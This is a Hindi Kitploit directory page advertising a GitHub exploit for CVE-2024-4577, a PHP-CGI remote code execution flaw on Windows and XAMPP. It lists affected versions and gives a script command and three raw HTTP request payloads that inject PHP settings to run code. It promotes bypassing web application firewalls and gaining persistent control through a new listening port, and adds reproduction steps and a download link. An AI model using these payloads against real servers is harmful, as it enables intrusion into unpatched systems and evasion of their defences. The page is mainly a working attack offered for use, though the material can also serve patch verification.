Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/a-roshbaik/cve-2024-4577-php-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंग
GitHuba-roshbaik/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

विंडोज़ पर CVE-2024-4577 PHP-CGI RCE के लिए एक्सप्लॉइट, WAF बाईपास और SSRF समर्थन के साथ। डिफ़ॉल्ट, WAF और SSRF परिदृश्यों के लिए कई एक्सप्लॉइट वेरिएंट प्रदान करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
42 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2024-4577-PHP-RCE

परियोजना परिचय और सिद्धांत

  • पहला वैश्विक EXP जो PHP डिफ़ॉल्ट वातावरण (XAMPP) के CVE-2024-4577 PHP-CGI RCE भेद्यता का उपयोग करता है।
  • दुनिया का पहला CVE-2024-4577 PHP-CGI RCE शोषण जो डिफ़ॉल्ट PHP वातावरण का उपयोग करता है। मूल शोषण साझा करना, SSRF का समर्थन करता है, WAF बाईपास का समर्थन करता है।
  • PHP डिफ़ॉल्ट वातावरण RCE को लागू करता है। सिद्धांत: cgi.force_redirect + REDIRECT-STATUS।
  • नया मूल EXP जो WAF बाईपास परिदृश्य का समर्थन करता है। सिद्धांत: FastCGI सर्वर स्थापित करें + FastCGI प्रोटोकॉल संचार।
  • नया मूल EXP जो SSRF परिदृश्य का समर्थन करता है। सिद्धांत: data:// प्रोटोकॉल + GET अनुरोध।

EXP 1 के लाभ

  • allow_url_include, auto_prepend_file, auto_append_file की आवश्यकता के बिना RCE। किसी भी फाइल और php फाइल को शामिल किया जा सकता है।
  • WAF द्वारा अक्सर अवरुद्ध किए जाने वाले कीवर्ड allow_url_include, , का उपयोग नहीं होता।
auto_prepend_file
auto_append_file
  • FastCGI सर्वर का सभी संचार WAF द्वारा रिकॉर्ड नहीं किया जाएगा।
  • नए पोर्ट पर सुनना, इस प्रकार PHP सर्वर पर स्थायी नियंत्रण प्राप्त करना, Apache और PHP से स्वतंत्र।
  • भेद्यता परिचय

    जानकारीसामग्री
    भेद्यता का नामPHP RCE
    भेद्यता संख्याCVE-2024-4577
    जोखिम स्तरउच्च जोखिम
    भेद्यता प्रकारRCE
    उपयोग की कठिनाईकम

    प्रभावित संस्करण

    • PHP Windows संस्करण 8.3.0 <= प्रभावित संस्करण < 8.3.8
    • PHP Windows संस्करण 8.2.0 <= प्रभावित संस्करण < 8.2.20
    • PHP Windows संस्करण 8.1.0 <= प्रभावित संस्करण < 8.1.29
    • PHP Windows संस्करण प्रभावित संस्करण == 8.0.x
    • PHP Windows संस्करण प्रभावित संस्करण == 7.x
    • PHP Windows संस्करण प्रभावित संस्करण == 5.x
    • XAMPP Windows संस्करण 8.2.0 <= प्रभावित संस्करण <= 8.2.12
    • XAMPP Windows संस्करण 8.1.0 <= प्रभावित संस्करण <= 8.1.25
    • XAMPP Windows संस्करण प्रभावित संस्करण == 8.0.x
    • XAMPP Windows संस्करण प्रभावित संस्करण == 7.x
    • XAMPP Windows संस्करण प्रभावित संस्करण == 5.x

    EXP 1

    WAF बाईपास परिदृश्य + डिफ़ॉल्ट परिदृश्य में उपयोग किया जा सकता है:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    उदाहरण:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    SSRF परिदृश्य + डिफ़ॉल्ट परिदृश्य में उपयोग किया जा सकता है:

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    डिफ़ॉल्ट परिदृश्य में उपयोग किया जा सकता है:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    डिफ़ॉल्ट परिदृश्य में उपयोग किया जा सकता है:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    पुनरुत्पादन

    1. सर्वर वातावरण:
    root@kitploit:~
    XAMPP Windows版 8.2.12
    
    1. सर्वर डाउनलोड करें और XAMPP स्थापित करें:
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    या यहाँ से प्रभावित संस्करण चुनें: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    1. सर्वर कॉन्फ़िगरेशन:
    root@kitploit:~
    कोई भी संशोधन न करें, डिफ़ॉल्ट कॉन्फ़िगरेशन रखें
    
    1. क्लाइंट द्वारा EXP का उपयोग:
    root@kitploit:~
    उपरोक्त EXP का उपयोग करके परीक्षण करें
    
    1. सत्यापन:
    root@kitploit:~
    जांचें कि क्या स्ट्रिंग "TesT" या सर्वर की system.ini फ़ाइल की सामग्री वापस आती है
    
    टूल डाउनलोड करें